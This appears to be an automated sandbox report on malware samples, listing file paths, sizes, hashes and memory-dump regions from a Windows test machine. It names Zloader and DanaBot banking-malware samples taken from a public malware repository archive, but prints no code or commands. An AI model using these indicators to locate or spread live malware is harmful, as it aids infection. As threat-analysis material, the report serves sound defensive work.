df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
37f660dd4b6ddf23bc37f5c823d1c33a

SHA1
1c35538aa307a3e09d15519df6ace99674ae428b

SHA256
4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8

SHA512
807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

Filesize
3KB

MD5
e0cf030848a94aa1b8dd5e052569ff64

SHA1
d809811f00b5a439f973c92d033ae49ee526314a

SHA256
a27fd0a5f26bdab76d59416396effa814b49d10443b52c99b91acf1c1398e3bc

SHA512
cccdd9451a300232e06d17eab1ebc445d8a29c4ba6029e4119fab8dbe682abc786878a3262c34480677fb01873068a42124f1503be757a68534a3b84f6e15386

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
b9f7a49e336741f1cdb51c031fc3afb0

SHA1
d2e4050ab0cb0724d853e098507120929e72dd5c

SHA256
fccdaaf1fd313463d5e65b774e8177c94781cc024951fb0cdac0a705f6aaa3f4

SHA512
18088a1ab088b022fc31c0414278cbf399eb33e89e7f741f96d3975f5e79b40bcc13a3a6ba5ccc96ef28f2fc130ad4fce21fabd541fcc19c4c3cf31c9e5e1d2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
419c042cdbe38f8c70a92a7448a5afcb

SHA1
22eb98ba57284f0729100a46200c190c313c20aa

SHA256
6703de4582d6ec0756dbc8ff5355a4ab6899dca21293dd1d5a8e6be712ba0ee0

SHA512
a2dc55afa1a841f2ced6c431429c6a3230fde0cd2c36f5ca5767f6fd618a841b95945dcae6f2763558c221ab17344d955dbe29b54557f1024b3a9655e5fd5c04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
b689192f8e4fb2ebc7dc675c2f2e8235

SHA1
c9045eb5ebff8b86e625b575c822026c5c1e3afb

SHA256
a826572898fb04d1fec90e414be56226f94faed1ef4445a786a460b5d2911afc

SHA512
04b93fc1cf84ce34621289ab73c6f43157c307d34959489dfd1a5ad7aaf4a46247127dd05ca0320c6afefab28f0b1ff572be8556f12863218e00eec9abc36639

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
de82feb1a22ce9647c4fc6d531a90a43

SHA1
35b1f73e5ac4457e7fb4a15247c5a8e31ca627c7

SHA256
fd9aa93fa03780fe00c480db9d2b731e0e561370a4dfe794643fe1ebaf04df70

SHA512
b287c93ceaf2cc51f5fe7b61da3c149c7b135dec2ea9dc032f78c51f1dcbd81882a7fcf6d256ff10da7cf6391fa1dc98242d0d049d625652c8bcccc2e7790376

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
ec2d2256dd205d4a1ecb52a16b5f5456

SHA1
0db9a44f1be05f3929124de405c685eeb224c62d

SHA256
5729755399aff877cd7cf2162d4fbf453a92b72b3ce1786c02bcc488e2a5e1be

SHA512
800c7305693b262d89d53eef08313c055028a7a4823ef3f450b41c221b5991ad78616d6d0ebc6dab0bc64ee32777173a6cad6bfae1754ca6cb1213f07ab1a6d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6865321b5ffb36cabc1e4d6f22955fb9

SHA1
9b5d7f78b180c646671dd3e176dd85cc33d0b2f3

SHA256
0bd3630b604178ee1196ef4d04ce52fa729a77f4b0cdcdf5a15aa0d7781651b3

SHA512
5bbd1fdeadfa014ea5e28f9f97395646291fee31591a1592482518531650571601199627ed398ce339d8c96556bec888fb07e7fcadc5c6fa300b383328ff47b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
79abfe748980250c16d6fd3639a6ccc5

SHA1
81417eb469a997aec584f5d340b2988b6c115413

SHA256
baa3e0d49cf9d89beacfb0ecd0f9f81941f98ad1a520449fa1920017bb213a87

SHA512
7000ac126f5fcbb27302067efbcef91adfc37964459b6220ebf35920c64d2cd7257154d82cc916378a2bfd10ef4cc45c0eb4cd49b5836bcc4637b9ae6167a991

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
a592b2b2e8f8548286ead1cf13a2c9f1

SHA1
1f2011c1402383eae27564d3d3170bfceaa169f5

SHA256
0e4408b53928008829c338ac81ae3da82cafd2123da8523337ecf3b74fad735c

SHA512
c46e85d35c8d738f1f7fc539cdd3bfa7e83a739a530bb1a4e5f39924f878439dc23049c4390b915ad0d01cb4d6d2353fe4b898d5ef285294c9c03cb77ec56728

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
bf7e06582f053a7c37a194c9060bcb9c

SHA1
8be736ec6487995864c9262278fee551e6fc15c4

SHA256
9617b6e971783b31d61d08dde105334674cfd23b340abda79fdd696fb66f4cdd

SHA512
0a04e53ec558a2398c364c3b9f4f2d42e27a0c58e17bff870cfd085b02632aa4b7d065209ffd6f8c64b0d9f5b7cf433dd35e2b915f335ab067bc74e85edd3aba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
91171b61ef7f2b26eacfb0ed3e9bb522

SHA1
ccfb1eb1091fb09737dfa4896c6f2499ac6b8130

SHA256
4e6032f106fcf4c7588e56b6ff9c023407dd45ca3f26a3fed9c050637ed259f1

SHA512
3ff863f4e1c448ca7727986065c105eadff1f962d144575a923945e709406bb5829df19e9f79daf85fe9b20b762a71bb2e5ee03d2295d8ebbfd3c0352218bd2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
0df9a40e2f7c4dcdd1167d3a59282b12

SHA1
7f34838857c2ce5fd4787967487ec709a5f24817

SHA256
900f220c99f2b54554ccb7de51583c7c00e0ee48400eb56929522cdc4f59bf95

SHA512
10acba1dae2b54aab41700d8e9481ba770040fd894e90f5841775e8c43a08d2c4c3778b62b68f99d89885cdb2987e5966dc216a98a52cf346f0fdb1380d68a4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\1e601bae-dcec-49ab-a231-4f9b1fe5d90c\index-dir\the-real-index

Filesize
2KB

MD5
9af694411608abcbe167b93df165d53d

SHA1
97ecac17fde2bb8ddd926942539290359dd0b3de

SHA256
88367719754bae6e39612d717abf15cdae7ebcf9707a2e5c21c8c16639a460e6

SHA512
05d2e61f6c4e07cd73a795ae4917af394c2b544dc6527d12ff63bacb02425121b14600462cf314843edb8b0b74b2d88fdb0a09da911c98b58c1c1543a190791b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\1e601bae-dcec-49ab-a231-4f9b1fe5d90c\index-dir\the-real-index~RFe583330.TMP

Filesize
48B

MD5
94b53d8b8108057d551c23528571ead5

SHA1
415c751785824b2feb806362d3227ef7e3321d47

SHA256
5c4abed5bf60d954210f9db88f79bacf49bedd68fa5bceab664f76e448807ccf

SHA512
570ff4928b86a38c6ea840f27299100b2b92bf0d6ff9c1dbc7903cf3c79fcf01aac3b2b4495dd60a42b59b43c58ef971422b6fff183694e303468c59a0fd2f14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\b258809b-caea-4c71-a8c4-3ba8cb46ae6c\index-dir\the-real-index

Filesize
624B

MD5
d8fadc08846b4adb0692e003fcd842b1

SHA1
624bcfcf5aaa6e055d3cfc02d914fe12127e98b2

SHA256
e2d82c29131709edb5be4ae7449fa6146d097b8ef08540dcd79c9aa033941d78

SHA512
fc5218710decbd6787d74564cc30dafe3a368b1eee7a500246073a8d5c42da89445754696108d2366a494a6a5769758a7d60d166448a908f6f2fc6bed8d48ad2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\b258809b-caea-4c71-a8c4-3ba8cb46ae6c\index-dir\the-real-index~RFe581fb8.TMP

Filesize
48B

MD5
98e2c909a377be49d86643addc5b0c21

SHA1
15435717a3815f503c50103133d232d0822cf98e

SHA256
54869eef89092013998f11ad0494bd53b564ea167726fd9f8316d1c9129f0fa3

SHA512
d26e259dd762d17f0bccf50058dc1dfe0393a88126896756fd516cdf95329a36d52d4a224144622e98287a4b9901f9f1fa547898564041d79071d954f5429852

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
89B

MD5
e359d215b31e8851c93acaafcb0b443c

SHA1
89ee282a94962f8dc9cce3dc75909e00732db5a4

SHA256
7e3d4c87b853f61c058bc475bad19649257a48d27e69c0e93fb511039a885f4e

SHA512
461df0e426a89015c58ac545281659e31d443d5cec21bb84642d633fe136843245af67c291c9d2b5be942bb7ca9ff5b206373016f39720e98dc712e12f487219

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
146B

MD5
13eb815b1327f3818e33d6b50da20b08

SHA1
e828016b51057f98608847501faef163e2c52d96

SHA256
c2302868795f08b9fb37fc057334a7fe7fe82ba6c4bcd5ba7e780413912e8777

SHA512
dc8fff894ac8a584a307ce6d7d8b609def271d54ff73e61dd53c77b0494b16ccd18f2950dca8fd8a6f0738bd5534d6562223e81f9737c99e6bf961f51d0a9028

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
155B

MD5
0f85bc6e19ae8acb1043bcff881fa965

SHA1
9180ed9cf6c0462c0c9c4c58a007350cbd84f099

SHA256
6699b6dc322791829c21fe8123b4ec5eb4c2634faf1160c57ba2e4f6968a48e1

SHA512
961af42bc437b9c320e816bf1bc12fd9301f9a9b12d7eb8d93f7f560ea0ce95bfdce75054b2f4db824bef44cf0c72dc6f102c38d4ef511ab8f4eab6b0f4f389f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
153B

MD5
776f545dae9dd7b86bd4b3da5507a128

SHA1
f057ba9430e4644bfe48fddfae6f5a7c9443745e

SHA256
27f77200d7e8949c3b0160e540c841dea02d65f6582703fbc79db76cd0732151

SHA512
c2c63c4e32f26bb1f8cafc5e2e5ecc18a90d6e8c84a43fae489b9e87b9b752e014178b219dd69fc93c5967b503067d627bb4edb0bc963625f5d7544812a48e26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
82B

MD5
8e5c8131ecca60d5a141ad5bd14848f5

SHA1
253c6750d1c482bb2e259482dc682a3d533a4301

SHA256
4d0012d6edae41d51ce2049fe04c90f6730ec96b86cff25425cec2b378a6c26e

SHA512
08ad41cb7c6b419830c55c0bfa52949350db169ab7865257d451c6fafbc1464d4b40cf8851a1e4c4927c0094f4542c4cdcf97750018c4b06f0a7e948bdd68566

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
09ba5479bcc2240f4a5369475e25749f

SHA1
774a57320279837bf8a88d2a95bd929acf391786

SHA256
301f5bd9ddc5a8ae0421a3da3b622a86dc90c755b3b6b5a460048ce9d8dd36de

SHA512
45c3820e55443ca38c09157d4acd0aeab01aa808b2dfa09447bbf1c3d7ce6612fd278fb2801b6248b14d65f4bab6f7a7be7763ffe65d1f239848daa92a1e1f8b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5816a0.TMP

Filesize
48B

MD5
6befc2cc1f6d0ac69c10291601269ae3

SHA1
b8e834d50a03476e1c187fb702f8a981d6beac70

SHA256
df881f93eacbfb7a7feabd91a29c694b3225408458ffef9f599da7a12d78de26

SHA512
2346951c629301c864b97261be2c9bad114655fb9b3a4a60d7cb9c03e6ce5a5106877bf3aa8a799619c6aa22385744a114917235a16106659378df4463e07294

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
b6180984bc7a8f5ee9c2f000cc6c42f7

SHA1
fca2669e61cb781eb47a86a2afe77a6e32dcdd25

SHA256
ecedd8fc3e7ed3389aa5bc1b26b47e77fbe9fab09f5cf9b5d73f4ea84119f667

SHA512
148afb735c0be87863e2b8d28f20334a41ddfc1c710883b22c38f876a02f357364c29b56b68679d88d51f4b9b3c5f901d8acae33300d41c76b24b40eddb2e15f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
704B

MD5
1f77a6734332b584e20eeceba163f4dc

SHA1
c9f5f38d786e141734c40d292351c93bb736edcf

SHA256
b417ed03fffebc5e0a0376678a72e9cb012c9560478b7485e20d595fe80aaf26

SHA512
b475b899b6e505a23bd14425f2f8560e630cd0f1f9e21e3199592173f6b39441af0de42aa2eaa703c69d9ed862206297018fd637800ad2e793bbcf2f642d5a5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
07de1e421894fb5aab5fcc5f8d07075b

SHA1
fd4aeafa0456ede86c6ba85ff10a1acc6b543218

SHA256
0a8d317c9977ae1d445ece854d2f2d6020a357d6972493e0178379df4bb14791

SHA512
a5075e4eb681ecd4790bf90cbc72902335351596be5bc463b5c8d7a8a16c1a8dd030b633c91af3e6e09040cb532e09290a2d217cbd1d17a44a5097006ed39c2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
5a632a4c0a07c83ebb978f4b677c2713

SHA1
0eb87b20ded6458fd694a1241bc296329e5bc74e

SHA256
14375a516c4cd95b51d9ae1cd97569a7017b8011a03a00902c5744b039e6e671

SHA512
a3e235f84e8f0524afa8d0356501b17a93f12a7b2bf0b3f0e2d2a655f472297532d0ab856277eb38031cdd90af24d59b534081cfabb527dece8bfa6650d73587

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57e222.TMP

Filesize
533B

MD5
184fb5a46e8daebdbd610249e66ebbd1

SHA1
f8ed158824d5f208993a5ab74b2a9b434988c230

SHA256
4fd884abc134b98c0416162dd35a210a9a7a810b4192565d672bf5dcbcec9e1d

SHA512
fd8a38d7ca2edfac7cc07ddaa218675229960e88e7ebf5ae8f3e14aa51ff43ac67e614d8b05c9942d5e019bbafbe3795845e567c53748cd6fb451d4225b6338b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
cffffe4445679c13a6d3ba1dff7265a4

SHA1
9a9bba040a331fe587f82ac5e6ff2279b0d760b6

SHA256
01e0df36c63893bcbd0a7d264d493b2140c48bcdb4a72e2bf8b02f2b9e9f0215

SHA512
0d1a48e33527d3479c2287375267c1a4344e3b670902ba0735e645a82b410eba4c7eedd295dcf30aac939b30e4f91ce7de10bec8547469053de279486b4cc2a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
9b7f945ce1d9cfea18315328a84e91dc

SHA1
befcf2aa07acd184eff780f602545f38e3ebd23d

SHA256
733ba4f859b24044eda9d5748f1987fdc4f71d91debfa116f25d222c1aa71995

SHA512
35a2e7768cf7c38e10e424a09a5f661e9028142e58012acb8475e710400d918e3567e86aec455596b1b43d4fc6fdc6ac4a674a726d9789f232ad68ab3b9eecaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
c75086ee4a999e97c1aba5da16ae7287

SHA1
eff8063a3a33e60163decedd768bfc63317e961a

SHA256
915960f6b2a369d1b5b5117de5ae782f1f34d39e1953abb403f9671a69437501

SHA512
c8e4b44493c29fe2939aa7d230882d63279cca6c10afd2499d1003576421c59de558ebb70036e921277d6de34ff1763478bafad506462af8f31a1ea2df2faaf2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
6c6867a6f9ab45e3a526e4ac39988a0d

SHA1
1cb8edaf81104daba6f03650938501f0482a850d

SHA256
383b1b271d1029fe4fc1f86967cb22f96972ab96a88478d91dc57f2938264e65

SHA512
27d31ffd0497b4963f553459d58ef919d103e5d7a6cf4b0ff51e9490e619d02cc74803b0760bcaacb13b9589cbae93708f20e4b2f20b2a8d592af870338cf32e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\9E4AB722-2B34-4B7C-9734-97CCE1BC55C8

Filesize
177KB

MD5
ae23dab34338f82745b01f4bca345895

SHA1
661ccb1a6278475a0924ff615db029170046ead8

SHA256
3af9230a1c2972ae991723783f4f128b92d90ad46e4da482a4a5eb42d4ac2d93

SHA512
b0fea4dd9b75355e80904a5854c4df75bb52a9602dd185bd30ca71e2d99cc2e11cd01af84fbc390227ed53efc760c85eb61d6de9bd9ec1be4e662bb0e0d267ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\logs\mip_sdk.miplog

Filesize
7KB

MD5
89a568cfc5f2cf4fff8e666b811c325d

SHA1
f86e62d2686cd839f615f7013dbf655ec1b120ca

SHA256
8ddee746d88e9f9ee16b907187c90355f35acca6007bb918e8490fc549ba1e5f

SHA512
44cbadf93355a9865fa0c3fdedd2d588fdf06f1943c85f144693fee05a67419b98c1b60e833bfd8107578415baecb9a106eec36e4cffdd7a5e0438a4051351ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Filesize
2KB

MD5
916abfbf834e8a6d121d2439c91e855a

SHA1
f60e89f8378aed568a399305aa594ea63887b440

SHA256
275846dba99782a04ff24ce8dd22c4c2aa00bb9de34210618e32f303ae78a00b

SHA512
3f80d57ece84162f190e310d9678bebcd6ad4c52cce22c3b5eb31a94dee37e38d49384f570d74799007cfd27253a4438791e18a9a2f459aa162cdb33db18cde0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

Filesize
2KB

MD5
6fdbb9498b84fa141492001d4755c7d3

SHA1
02e36aed2f1fab5076f9d9ba1e2e050dd5883e48

SHA256
a0ce1590e4c0403c4807354018496bc696428ea3fccfa792502a165c51bb83b5

SHA512
4b975950c67723710b8e9151a2c4c9be89fdfcf7742ebbff6a8a8dea5304908bd1f97447188581bc84d623b125f7ce3f8418e87cbde1bf7a6020e62edfb5a711

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

Filesize
4KB

MD5
09d0254a7f81768c57ab12ace141be8e

SHA1
63e6ce8af0713daed70511a20a627712b79644d6

SHA256
fc2eeab53bd6d2aac5bcee7aaa5b50ca322dd5d1cb8d797a26f7859599de153f

SHA512
e4b59a5b0d5bff66f21fc8535ef3a66663bb3b5f8d27f538ba45ec3a61224d1d307dbfae3bbda37a35ea5e49272f761f81d94589f1325d2c97eecab1cb97a0c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\522004A3.wmf

Filesize
430B

MD5
d3c7f99d17922b4f9c8390e5a73df019

SHA1
22a09d46b5690b8c452cf5b9cb2ee85187e52bcc

SHA256
e386f8e4370618c78022facdf71e5009b6dbf82d52690a2e5e0c6f10078532bb

SHA512
0e6349199cd2146cbf33ba741d701fd94d584204e6d08aad28034274075a2498e223657a45149cd3bc2a218fd47f1bc958ecbc99d33a3f7c1e482b4c739f0afe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FDFB40AA.wmf

Filesize
430B

MD5
d68a96c4a97cfdac710decb8ff7f107d

SHA1
f6be07d929bac1870ff602ab4aa81b568594387c

SHA256
51c72ae6e0623c04dda14594a267f6a527d94fe6478f8c8d567934769bbec533

SHA512
01ba76e65743d2e45d6dad036d138cab6c3fa20efc77fb46533f5ee204ce81b927da2c43e1715ba922980087b7ec8bdc91f59f940b67c2d02a92054a7b9d24f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCD2937.tmp\sist02.xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Banking-Malware\Copy of Zloader.xlsm

Filesize
94KB

MD5
134d6a05f26c4a828b4d5cacc12fcbb0

SHA1
89eeb640f33b816c63dca15ad9b822188b6aebb9

SHA256
591d1793ff40c2249f0673fce3eac72d41aad71f51adb47f8eca9c0cf56892d3

SHA512
61ddd989b36e5dfe4eb47d187d56750c6ba03a05ae5a87fbc40f50724555791a73225506477af273caf1651ed1b4817adca9cfbc903bd51db563db04d043fde6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gswwx3fe.40e.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
18KB

MD5
73031ca2cafa368ff47532c8083d6ef8

SHA1
ef1290028c76b1e4961ceee8f244db8919746ba0

SHA256
bc994275768726d106b978b47f893d54d07b7f26f3514c82ba4800ce37f57421

SHA512
61ece11056a02226edb9888a424f16116035fb92fbde03b93c8b42a67d78eab2e3baa0d1d05c2db30afde4f21e9437c2c81b4899be64e41d55df717060fbcc5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\DOWNLO~1\THE-MA~1\THE-MA~1\BANKIN~1\DanaBot.dll

Filesize
2.4MB

MD5
7e76f7a5c55a5bc5f5e2d7a9e886782b

SHA1
fc500153dba682e53776bef53123086f00c0e041

SHA256
abd75572f897cdda88cec22922d15b509ee8c840fa5894b0aecbef6de23908a3

SHA512
0318e0040f4dbf954f27fb10a69bce2248e785a31d855615a1eaf303a772ad51d47906a113605d7bfd3c2b2265bf83c61538f78b071f85ee3c4948f5cde3fb24

Download Submit
memory/1608-1089-0x00000281BE500000-0x00000281BE522000-memory.dmp

Filesize
136KB

Download
memory/1892-1698-0x0000000000400000-0x0000000000AAD000-memory.dmp

Filesize
6.7MB

Download
memory/2116-1689-0x00000000025A0000-0x000000000280B000-memory.dmp

Filesize
2.4MB

Download
memory/2760-1704-0x0000000000EC0000-0x0000000000F32000-memory.dmp

Filesize
456KB

Download
memory/2760-928-0x00007FFB44180000-0x00007FFB44190000-memory.dmp

Filesize
64KB

Download
memory/2760-927-0x00007FFB44180000-0x00007FFB44190000-memory.dmp

Filesize
64KB

Download
memory/2760-1705-0x00000000058B0000-0x000000000594C000-memory.dmp

Filesize
624KB

Download
memory/2760-1706-0x0000000005F10000-0x00000000064B4000-memory.dmp

Filesize
5.6MB

Download
memory/2760-1707-0x0000000005A00000-0x0000000005A92000-memory.dmp

Filesize
584KB

Download
memory/2760-1708-0x00000000059E0000-0x00000000059EA000-memory.dmp

Filesize
40KB

Download
memory/2760-1709-0x0000000005C10000-0x0000000005C66000-memory.dmp

Filesize
344KB

Download
memory/2760-1710-0x0000000005BF0000-0x0000000005BFA000-memory.dmp

Filesize
40KB

Download
memory/2816-1903-0x0000000000400000-0x00000000006BC000-memory.dmp

Filesize
2.7MB

Download
memory/2816-1909-0x0000000000400000-0x00000000006BC000-memory.dmp

Filesize
2.7MB

Download
memory/2996-1852-0x000000001BB10000-0x000000001BBB6000-memory.dmp

Filesize
664KB

Download
memory/2996-1853-0x000000001C090000-0x000000001C55E000-memory.dmp

Filesize
4.8MB

Download
memory/2996-1854-0x000000001C680000-0x000000001C71C000-memory.dmp

Filesize
624KB

Download
memory/2996-1856-0x0000000001540000-0x0000000001548000-memory.dmp

Filesize
32KB

Download
memory/2996-1857-0x000000001C8E0000-0x000000001C92C000-memory.dmp

Filesize
304KB

Download
memory/3384-1849-0x0000000000400000-0x00000000004DF000-memory.dmp

Filesize
892KB

Download
memory/3384-1847-0x0000000000400000-0x00000000004DF000-memory.dmp

Filesize
892KB

Download
memory/3384-1860-0x0000000000400000-0x00000000004DF000-memory.dmp

Filesize
892KB

Download
memory/3384-1858-0x0000000000400000-0x00000000004DF000-memory.dmp

Filesize
892KB

Download
memory/3384-1851-0x0000000000400000-0x00000000004DF000-memory.dmp

Filesize
892KB

Download
memory/3756-1695-0x0000000000400000-0x0000000000AAD000-memory.dmp

Filesize
6.7MB

Download
memory/4212-868-0x00007FFB44180000-0x00007FFB44190000-memory.dmp

Filesize
64KB

Download
memory/4212-865-0x00007FFB462F0000-0x00007FFB46300000-memory.dmp

Filesize
64KB

Download
memory/4212-864-0x00007FFB462F0000-0x00007FFB46300000-memory.dmp

Filesize
64KB

Download
memory/4212-919-0x00007FFB462F0000-0x00007FFB46300000-memory.dmp

Filesize
64KB

Download
memory/4212-863-0x00007FFB462F0000-0x00007FFB46300000-memory.dmp

Filesize
64KB

Download
memory/4212-921-0x00007FFB462F0000-0x00007FFB46300000-memory.dmp

Filesize
64KB

Download
memory/4212-867-0x00007FFB44180000-0x00007FFB44190000-memory.dmp

Filesize
64KB

Download
memory/4212-862-0x00007FFB462F0000-0x00007FFB46300000-memory.dmp

Filesize
64KB

Download
memory/4212-918-0x00007FFB462F0000-0x00007FFB46300000-memory.dmp

Filesize
64KB

Download
memory/4212-920-0x00007FFB462F0000-0x00007FFB46300000-memory.dmp

Filesize
64KB

Download
memory/4212-866-0x00007FFB462F0000-0x00007FFB46300000-memory.dmp

Filesize
64KB

Download
memory/5356-1696-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/5356-1692-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/5864-1691-0x0000000000400000-0x0000000000AAD000-memory.dmp

Filesize
6.7MB

Download